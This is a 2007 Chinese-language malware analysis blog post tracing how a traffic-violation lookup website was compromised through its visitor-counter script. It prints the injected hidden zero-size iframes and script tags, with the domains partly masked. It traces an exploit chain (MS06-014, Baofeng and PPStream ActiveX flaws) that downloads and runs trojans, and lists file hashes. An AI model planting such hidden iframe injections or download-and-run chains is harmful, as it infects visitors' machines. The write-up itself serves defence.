某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等

某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
endurer 原创
2007-10-26 第1版

问题出在该网页所用的计数器代码上：
/---
＜script src="hxxp://www.h*c**jj***d.com/wfcx/count/online.asp"＞＜/script＞
---/

看看hxxp://www.h*c**jj***d.com/wfcx/count/online.asp 的代码：
/---
＜iframe src=hxxp://user*.free.77**16*9.net/%73%61%74%61%6E%6C%73%78/sa.htm width=100 height=0＞＜/iframe＞＜iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0＞＜/iframe＞＜iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0＞＜/iframe＞＜iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0＞＜/iframe＞＜iframe src="hxxp://web**.*59***cn.cn/bzsiyu/index.htm" width=100 height=0＞＜/iframe＞＜iframe src="hxxp://web**.*59***cn.cn/bzsiyu/index.htm" width=100 height=0＞＜/iframe＞＜iframe src="hxxp://hack**t*ao.q**yun.net/" width=100 height=0＞＜/iframe＞
＜iframe src=hxxp://w**.7***373*4.cn/reg.htm?a width=100 height=0 frameborder=0＞＜/iframe＞＜iframe src="hxxp://c*.th*e**c.cn/hacktao/" width=100 height=0＞＜/iframe＞
＜iframe src="hxxp://M**.thIe**c.cn/siyua/" width=100 height=0＞＜/iframe＞
＜iframe src="hxxp://M**.thIe**c.cn/siyua/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://b**zsiyua*.5***12j.com/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/1.htm" width=0 height=0＞＜/iframe＞＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://www.m**8*585**3.com.cn/index.htm width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://www.m**8*585**3.cn/muma/index.htm width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://www.n*8*585**3.cn/index.htm width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://www.m**8*585**3.cn/gogo/index.htm width=0 height=0＞＜/iframe＞＜iframe src=hxxp://www.m**8*585**3.com.cn/index.htm width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://www.m**8*585**3.cn/muma/index.htm width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://www.n*8*585**3.cn/index.htm width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://www.m**8*585**3.cn/gogo/index.htm width=0 height=0＞＜/iframe＞＜iframe width=0 height=0＞＜/iframe＞＜iframe width=0 height=0＞＜/iframe＞＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://w**.m**h*88***88.cn/ad.htm?a width=100 height=0 frameborder=0＞＜/iframe＞
＜iframe src=hxxp://w**.7***373*4.cn/reg.htm?a width=100 height=0 frameborder=0＞＜/iframe＞＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe height=0 width=0＞＜/iframe＞＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://www.8***8o*u.cn/index.htm height=0 width=0＞＜/iframe＞＜iframe src=hxxp://www.8***8o*u.cn/index.htm height=0 width=0＞＜/iframe＞＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0＞＜/iframe＞＜iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0＞＜/iframe＞＜iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0＞＜/iframe＞＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://userI.free**2.7**716*9.net/siyua/" width=0 height=0＞＜/iframe＞＜iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0＞＜/iframe＞＜iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0＞＜/iframe＞＜iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://userI.free**2.7**716*9.net/siyua/" width=0 height=0＞＜/iframe＞＜iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0＞＜/iframe＞
document.write("＜a href=hxxp://www.h*c**jj***d.com/wfcx/count/ShowOnline.asp title=查看当前在线人数列表＞＜font color=red＞当前在线＜strong＞1＜/strong＞人＜/font＞＜/a＞")
---/
挂的东东还真多～

随便找了　hxxp://w**.7***373*4.cn/reg.htm?a　来分析。代码为：
/---
＜iframe src=dog.htm width=1 height=0＞＜/iframe＞
＜script src=haha.js＞＜/script＞
＜script src='hxxp://s*89.cnzz.com/stat.php?id=5*372*23&web_id=5*372*23&show=pic2' language='JavaScript' charset='gb2312'＞＜/script＞
---/

hxxp://w**.7***373*4.cn/dog.htm 的内容为：
/---
＜iframe src=hxxp://a*a.1***8d*d.net/ww/new04.htm?xinjiang width=0 height=0＞＜/iframe
---/

hxxp://a*a.1***8d*d.net/ww/new04.htm?xinjiang 的内容为：
/---
＜iframe width='0' height='0' src='hxxp://a*a.1***8d*d.net/aa/kl.htm'＞＜/iframe＞
＜script language="javascript" type="text/javascript" src="hxxp://js.users.51.la/12**996*44.js"＞＜/script＞
---/

hxxp://a*a.1***8d*d.net/aa/kl.htm 的内容为加密的JavaScript代码，经2次解密，得到原始代码，功能是若不存在Cookies变量OK，则创建，并引入漏洞利用代码：
/---
＜script src=hxxp:////a*a.1***8d*d.net//aa//1.js＞＜//script＞
＜script src=hxxp:////a*a.1***8d*d.net//aa//b.js＞＜//script＞＜script src=hxxp:////a*a.1***8d*d.net//aa//pps.js＞＜//script＞
---/

并下载 hxxp://down**.1***8d*dI*.net/bb/bd.cab

hxxp://a*a.1***8d*d.net/aa/1.js 功能是利用 MS06014漏洞下载hxxp://down**.1***8d*dI*.net/bb/014.exe，保存为ntuser.com，利用cmd.exe来运行。

文件说明符 : D:/test/014.exe
属性 : A---获取文件版本信息大小失败!
创建时间 : 2007-10-26 13:48:14
修改时间 : 2007-10-26 13:48:14
访问时间 : 2007-10-26 13:14:48
大小 : 37888 字节 37.0 KB
MD5 : 6d84039e781655f16185023a7a7c09e1
SHA1: 3FD12BE3D86DF261438BBED126C507D1E14A90E0
CRC32: 597058c5

Scanned file: 014.exe - Infected

014.exe - infected by Virus.Win32.AutoRun.xu

hxxp://a*a.1***8d*d.net/aa/b.js 利用了暴风影音MPS.DLL ActiveX控件多个远程溢出漏洞(参考:hxxp://www.nsfocus.net/vulndb/10900)

hxxp://a*a.1***8d*d.net/aa/pps.js 利用了ppstream的漏洞

hxxp://down**.1***8d*dI*.net/bb/bd.cab 包含 内容与 014.exe 相同的文件 bd.exe

hxxp://w**.7***373*4.cn/haha.js 利用MS06014漏洞下载hxxp://www.m***ir*7***21.com/mir721.exe

文件说明符 : D:/test/mir721.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-10-26 13:36:26
修改时间 : 2007-10-26 13:36:27
访问时间 : 2007-10-26 13:38:37
大小 : 28376 字节 27.728 KBMD5 : cfc4727cb3e255a15a3da2cdad8e60eb
SHA1: BCC8B3E76852BF6FC0D5661D93868E1F78DC2C38
CRC32: 41011c50

瑞星报为：Win32.SEG.bc

Scanned file: mir721.exe - Infected

mir721.exe - infected by Trojan.Win32.Agent.bwt